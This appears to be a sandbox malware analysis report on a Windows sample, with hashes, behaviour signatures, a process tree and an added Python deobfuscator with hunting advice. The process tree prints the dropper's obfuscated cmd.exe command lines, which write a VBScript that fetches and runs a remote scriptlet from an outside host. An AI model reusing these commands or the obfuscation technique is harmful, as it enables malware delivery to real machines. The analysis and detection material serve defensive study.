Analysis
max time kernel: 307s
max time network: 297s
platform: windows10-2004_x64
resource: win10v2004-20230221-es
resource tags: arch:x64, arch:x86, image:win10v2004-20230221-es, locale:es-es, os:windows10-2004-x64, system, windows
submitted: 31-03-2023 20:21
Static task: static1
Behavioral task behavioral1: Sample FACT_RY65855PAT0.zip, Resource win7-20230220-es
Behavioral task behavioral2: Sample FACT_RY65855PAT0.zip, Resource win10v2004-20230220-es
Behavioral task behavioral3: Sample FACT_RY65855PAT0.exe, Resource win7-20230220-es
Behavioral task behavioral4: Sample FACT_RY65855PAT0.exe, Resource win10v2004-20230221-es
Behavioral task behavioral5: Sample ~.exe, Resource win7-20230220-es
Behavioral task behavioral6: Sample ~.exe, Resource win10v2004-20230220-es
General
Target: FACT_RY65855PAT0.exe
Size: 1.8MB
MD5: 3d6b870b71fe64e9fab41314f4ff75cf
SHA1: 45e91fc8eb9cace7143d06a39166108b5531607a
SHA256: 1eeb7c8ef775f5bf2f0e19d3fccc2df475aadb65a039fbdc0593ed48d6ed24ae
SHA512: d093533ca4ca8e82029ef47c4135e15c99494e25d9db3ce49d06fb89cce44ee934288e98b15561b95911522a3f1b5e49f23a853b68389e53caebd7c88194c5d9
SSDEEP: 49152:eGj78kv0nmHkhPk0+mzTcg/S1OJqqA0ieped:ZXrv/Hky0RzPSMJ9AQod
Malware Config
Signatures
Blocklisted process makes network request (3 IoCs)
Processes:
flow | pid | process
41 | 3816 | WScript.exe
43 | 3816 | WScript.exe
46 | 3816 | WScript.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | cmd.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The sandbox flags this as possible ransomware behaviour; this report records no file encryption, so treat it as a generic indicator here.
Modifies registry class (1 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings | cmd.exe
Suspicious use of WriteProcessMemory (12 IoCs)
Processes: FACT_RY65855PAT0.exe, cmd.exe, cmd.exe, cmd.exe
description | pid | process | target process | count
PID 4436 wrote to memory of 1000 | 4436 | FACT_RY65855PAT0.exe | cmd.exe | 3
PID 1000 wrote to memory of 1976 | 1000 | cmd.exe | cmd.exe | 3
PID 1976 wrote to memory of 1568 | 1976 | cmd.exe | cmd.exe | 3
PID 1568 wrote to memory of 3816 | 1568 | cmd.exe | WScript.exe | 3
Processes
1. C:\Users\Admin\AppData\Local\Temp\FACT_RY65855PAT0.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\FACT_RY65855PAT0.exe"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo mf8=".":hk85=":":gn2="/":GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")>%Public%\h587.vBs&&%ComSpec% /c start %Public%\h587.vBs"
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /V/D/c "echo mf8=".":hk85=":":gn2="/":GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")>C:\Users\Public\h587.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs"
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs
            - Checks computer location settings
            - Modifies registry class
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\WScript.exe
               Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\h587.vBs"
               - Blocklisted process makes network request
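The cmd.exe chain above does not carry a downloader itself: it echoes a three-variable VBScript into %Public%\h587.vBs and starts it, and the script's only statement is a GetObject() call whose argument is assembled from string fragments so that the literal "script:https://" never appears on the command line. The helper below is an added example (not part of the sandbox report and not code from the sample) that rebuilds the string the VBS hands to GetObject, recovers the drop path and the script: moniker URL, and so turns the recorded command line into the IoCs an analyst would want. The sample input is the depth-3 command line from the process tree; the function and variable names are this example's own.

```python
import json
import re
from urllib.parse import urlparse

# Command line recorded at depth 3 of the process tree above (report data, reused here as sample input).
CMDLINE = (
    r'C:\Windows\system32\cmd.exe /V/D/c "echo mf8=".":hk85=":":gn2="/":'
    r'GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")'
    r'>C:\Users\Public\h587.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs"'
)


def split_outside_quotes(text, sep):
    """Split text on sep, ignoring separators inside double-quoted VBScript literals.

    VBScript uses ':' as a statement separator and '+' for concatenation, and the
    dropper hides both characters inside string literals (hk85=":"), so a plain
    str.split() would cut the wrong places.
    """
    parts, buf, in_str = [], [], False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def eval_expr(expr, env):
    """Evaluate a VBScript concatenation of string literals and already-assigned variables."""
    out = []
    for term in split_outside_quotes(expr, "+"):
        if len(term) >= 2 and term.startswith('"') and term.endswith('"'):
            out.append(term[1:-1])
        elif term in env:
            out.append(env[term])
        else:
            raise ValueError(f"unresolved term in expression: {term}")
    return "".join(out)


def deobfuscate_echo_vbs(cmdline):
    """Recover the script written by 'echo ... > file' and resolve any GetObject() argument.

    Returns None when the command line does not echo a script to a file.
    """
    m = re.search(r"echo (.*?)>([^&\s]+)", cmdline)
    if not m:
        return None
    payload, drop_path = m.group(1), m.group(2)
    env, calls = {}, []
    for stmt in split_outside_quotes(payload, ":"):
        assign = re.match(r"^(\w+)\s*=\s*(.+)$", stmt)
        call = re.match(r"^(\w+)\((.*)\)$", stmt)
        if assign:
            env[assign.group(1)] = eval_expr(assign.group(2), env)
        elif call:
            calls.append((call.group(1), eval_expr(call.group(2), env)))
    findings = []
    for func, arg in calls:
        # GetObject("script:<url>") resolves the COM script moniker and runs the
        # remote scriptlet (the same technique as the classic squiblytwo/regsvr32 loaders).
        mm = re.match(r"^script\s*:\s*(\S+)$", arg, re.IGNORECASE)
        if func.lower() == "getobject" and mm:
            url = mm.group(1)
            findings.append({"func": func, "moniker": "script",
                             "url": url, "host": urlparse(url).hostname})
    return {"drop_path": drop_path, "variables": env, "calls": calls, "findings": findings}


if __name__ == "__main__":
    print(json.dumps(deobfuscate_echo_vbs(CMDLINE), indent=2))
```

Run against the recorded command line this yields the drop path C:\Users\Public\h587.vBs and the resolved call GetObject("scripT:https://mtx.zzux.com/njmr1"), which is the same URL the WScript.exe flows 41, 43 and 46 in the signature table would have fetched; the variable gn2="/" is assigned but never used, a common artifact of template-generated droppers. For hunting, the combination of cmd.exe echoing a line containing GetObject( to a path under %Public% and a child WScript.exe reading that path is the behaviour to alert on, because the URL fragments change between samples while the structure does not.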
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Public\h587.vBs
Filesize: 99B
MD5: 0a7ccba24c3dd86e5af2e22e583e974c
SHA1: 2dad8b33c4bbcc73cbd61f94d5f17af392c0ebd8
SHA256: 9d69d5dd7aea0e2e3f4a18551bc6b1bfa8ab77c528fd1a5a29e3c4baf471c43f
SHA512: c7aabaebd16b16cff069d776ca06810aa60e9c950080c2503deaa93a22bb06b491b0cbaafb5b5917abf9b6e430558356612e08537444e34be0f966c0cd1ab249
memory/4436-133-0x0000000000510000-0x00000000006E8000-memory.dmp
Filesize: 1.8MB
memory/4436-150-0x0000000000510000-0x00000000006E8000-memory.dmp
Filesize: 1.8MB
memory/4436-151-0x0000000000510000-0x00000000006E8000-memory.dmp
Filesize: 1.8MB